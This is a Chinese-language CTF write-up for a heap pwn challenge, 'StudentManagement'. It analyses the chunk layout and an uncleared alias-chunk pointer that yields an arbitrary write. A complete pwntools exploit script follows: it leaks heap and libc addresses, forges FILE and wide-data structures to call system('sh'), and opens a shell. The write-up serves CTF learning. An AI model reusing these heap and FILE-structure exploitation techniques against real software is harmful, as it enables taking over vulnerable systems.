1. StudentManagement#

TIP
这道题是唯一一道要求 Fix 的，但是我不会，不会修

1-1 分析#

1-1-1 菜单功能一览#

对于攻击来说，这是一个菜单堆

一个大菜单主要是申请堆块（Reg）和删除堆块（Del）
一个小菜单主要是输出内容（View）和部分修改（Bio）

1-1-2 堆块结构#

我们来看申请堆块的函数

IMPORTANT
buf 是 Qword 类型指针，以 8 个字节为单位算

首先会申请可用大小是 0x88 的堆块，然后会往堆块写内容，其中：

前 0x10 是 ID，占大小 0x10
0x10 - 0x50 是 Name，占大小 0x40
0x50 - 0x70 是 Password，占大小 0x20
0x80 - 0x88 写入了某个地址，占大小是指针的 8 字节，这里 0x4030 是存放堆块地址的地方，而且是最近申请的堆块地址，这里是把自己的地址放上去，把原本的地址写到堆块的这个位置，不难看出这里要存一个单链表，我标注的 fnFindID 其实就是遍历这个单链表
所有输入全末尾置 0 并且不会越界
再看上面提到的修改别名的函数
大小被限制到了 0x400，不存在就根据输入大小申一个，大小超了就释放了申请一个，堆块 0x70 的位置放了一个记录别名堆块的地址，堆块 0x78 写了一个堆块的大小（输出要用）
至此堆块的结构就解析完了

1-2 问题点 & 利用思路#

我们回顾上面的别名堆块，他会先判断对应位置堆块地址存不存在，堆块符不符合要求，而且第一次增加别名的话并不会直接写一个地址上去，申请堆块也不会对堆块进行清零操作
这就会导致一个问题，我们如果有一个上面说过的堆块，这里正好可以留一个地址的话，我们就能在任意的某处写东西，进而构造成自己指自己的结构实现任意写
但是存在一个问题
正常 Free 会置 0，我们需要一个极其天才的设计，才能在对应位置写地址
其实当时很快就想到了，奈何开题开错了，脑子抽了没找到洞，人也不全，其他题被一个逆向部分卡住了，直接爆 0

1-3 解题思路#

其实就是堆风水，我们需要

一个非 tcache，能分出堆块且大小适合的大堆块
看图说话
1. 想尽一切办法，在这个非 tcache 的大堆上申一个绿色范围的堆块，然后释放，此时红色地方就会留下神秘小地址，这个工作基本交给 Bio 堆了
2. 然后再想想办法，将控制堆块申到橙色位置，我们就能往神秘小位置写很多东西，因为大小位置也是神秘小地址，大小肯定够、
  我认为红色位置是堆块地址是最有利的，可以构造任意写，所以我们对于大堆的要求是足够大，以至于我们分割这个大的 UnsortedBin 的时候可以留下 LargeBin 的头，而且大小范围内只有一个 LargeBin 的话指向的也是 0x33f0，符合任意写的要求，所以我们对应的绿色块其实小 0x10
  考虑到输入截断太多，这个任意写肯定是要多次的，但是往非堆地方写一次就不能用了，所以我们考虑改多个控制堆，所以当时我构造了这样的
  我们其他地方找个堆块，往大堆申请一个大的 Bio 堆，释放，红色地方留下地址，申请一个 0x88 的橙色控制堆，不释放，申请一个 0x88 的绿色控制堆，不释放，此时绿色堆可以往 0x3480 开始随便写
  我们还能写到橙色堆块，覆盖它的指针，可以做到泄露地址，任意写功能等等，下面脚本会介绍部分操作

1-4 脚本#

1
#
2
############################################################################
3
# Start your exploit here
4
############################################################################
5

6

7
def begin():
8

9
    for i in range(10):
10
        add(i)
11
        login(i)
12
        edit(0x400, b'114514')
13
        logout()
14

15
    add(10)
16
    add(11)
17
    add(12)
18

19

20

21
    for i in range(9):
22
        rm(i)
23

24
    for i in range(8):
25
        add(i)
26

27
    for i in range(7):
28
        login(i)
29
        edit(0x400, b'114514')
30
        logout()
31

32

33
    login(10)
34
    edit(0xe0, b'1919810')
35
    logout()
36

37
    login(11)
38
    edit(0x400, b'1919810')
39
    logout()
40

41

42
    for i in range(20, 27):
43
        add(i)
44
        login(i)
45
        edit(0xe0, b'1919810')
46
        logout()
47

48
    for i in range(20, 27):
49
        rm(i)
50

51
    for i in range(7):
52
        rm(i)
53

54
    rm(10)
55
    rm(11)
56

57
    for i in range(7):
58
        add(i)
59

60
    for i in range(20, 27):
61
        add(i)
62

63

64
    add(30)
65
    add(31)
66

67

68
    add_s(32)
69
    add_s(33)
70

71
    login_s(33)
72
    edit(33, b'\x00' * 32)
73
    logout()
74

75
    login_s(32)
76
    edit(32, b'4545454545')
77
    logout()
78

79
    login_null(33)
80
    choice(1)
81
    io.recvuntil(b'Bio: ')
82
    leak_addr = u64(io.recv(6).ljust(8, b'\x00'))
83
    log.info(hex(leak_addr))
84
    heap_base = leak_addr - 0x24b0
85
    log.info(hex(heap_base))
86

87
    libc_addr = heap_base + 0x2398
88
    payload = b'\x00' * 0x18 + p64(0x91) + b'\x00' * 0x70 + p64(libc_addr)
89
    edit(len(payload) + 1, payload)
90
    choice(1)
91

92
    io.recvuntil(b'Bio: ')
93
    leak_addr = u64(io.recv(6).ljust(8, b'\x00'))
94
    log.info(hex(leak_addr))
95
    libc_addr = leak_addr - (0x7b26f6403f50 - 0x7b26f6200000)
96
    log.info(hex(libc_addr))
97

98
    _IO_2_1_stdout_addr = libc.sym['_IO_2_1_stdout_'] + libc_addr
99
    _IO_wfile_jumps_addr = libc.sym['_IO_wfile_jumps'] + libc_addr
100
    system_addr = libc.sym['system'] + libc_addr
101

102
    file = FileStructure()
103
    file.flags = b'  sh;'
104
    file._wide_data = heap_base + 0x25c0
105
    file.vtable = _IO_wfile_jumps_addr + 24 - 0x38
106

107
    wide = WideDataStructure()
108

109
    # 过判断使用
110
    wide._IO_read_ptr = system_addr
111
    wide._IO_write_base = 0
112
    wide._IO_buf_base = 0
113

114
    # 上文说的想执行地址的地址
115
    wide._wide_vtable = heap_base + 0x25c0 - 0x68
116

117
    payload = b'\x00' * 0x80 + p64(0x91) + b'\x00' * \
118
        0x70 + p64(_IO_2_1_stdout_addr) + b'\xff' * 16
119
    payload += p64(0x31) + b'\x00' * 40 + p64(0x3b1)
120
    payload += bytes(file) + bytes(wide)
121

122
    edit(len(payload) + 1, payload)
123

124
    payload = bytes(file)
125

126
    pause()
127
    edit(len(payload), payload)
128

129
    io.interactive()
130

131

132
def choice(num):
133
    io.sendlineafter(b'>', str(num).encode())
134

135

136
def add(id):
137
    choice(1)
138
    id = str(id).encode()
139
    id = id.ljust(15, b'\x20')
140
    name = id.ljust(63, b'\x20')
141
    io.sendafter(b'ID:', id)
142
    io.sendafter(b'Name:', name)
143
    io.sendafter(b'Pass:', b'a' * 31)
144

145

146
def add_s(id):
147
    choice(1)
148
    id = str(id).encode()
149
    io.sendafter(b'ID:', id)
150
    io.sendafter(b'Name:', id)
151
    io.sendafter(b'Pass:', b'aaa')
152

153

154
def rm(id):
155
    choice(3)
156
    id = str(id).encode()
157
    id = id.ljust(15, b'\x20')
158
    io.sendafter(b'ID to delete:', id)
159

160

161
def login(id):
162
    choice(2)
163
    id = str(id).encode()
164
    id = id.ljust(15, b'\x20')
165
    io.sendafter(b'ID:', id)
166
    io.sendafter(b'Pass:', b'a' * 31)
167

168

169
def login_s(id):
170
    choice(2)
171
    io.sendafter(b'ID:', str(id).encode())
172
    io.sendafter(b'Pass:', b'aaa')
173

174

175
def login_null(id):
176
    choice(2)
177
    io.sendafter(b'ID:', str(id).encode())
178
    io.sendafter(b'Pass:', b'\x00')
179

180

181
def edit(size, con):
182
    choice(2)
183
    io.sendlineafter(b'size', str(size).encode())
184
    io.sendafter(b'tent', con)
185

186

187
def logout():
188
    choice(0)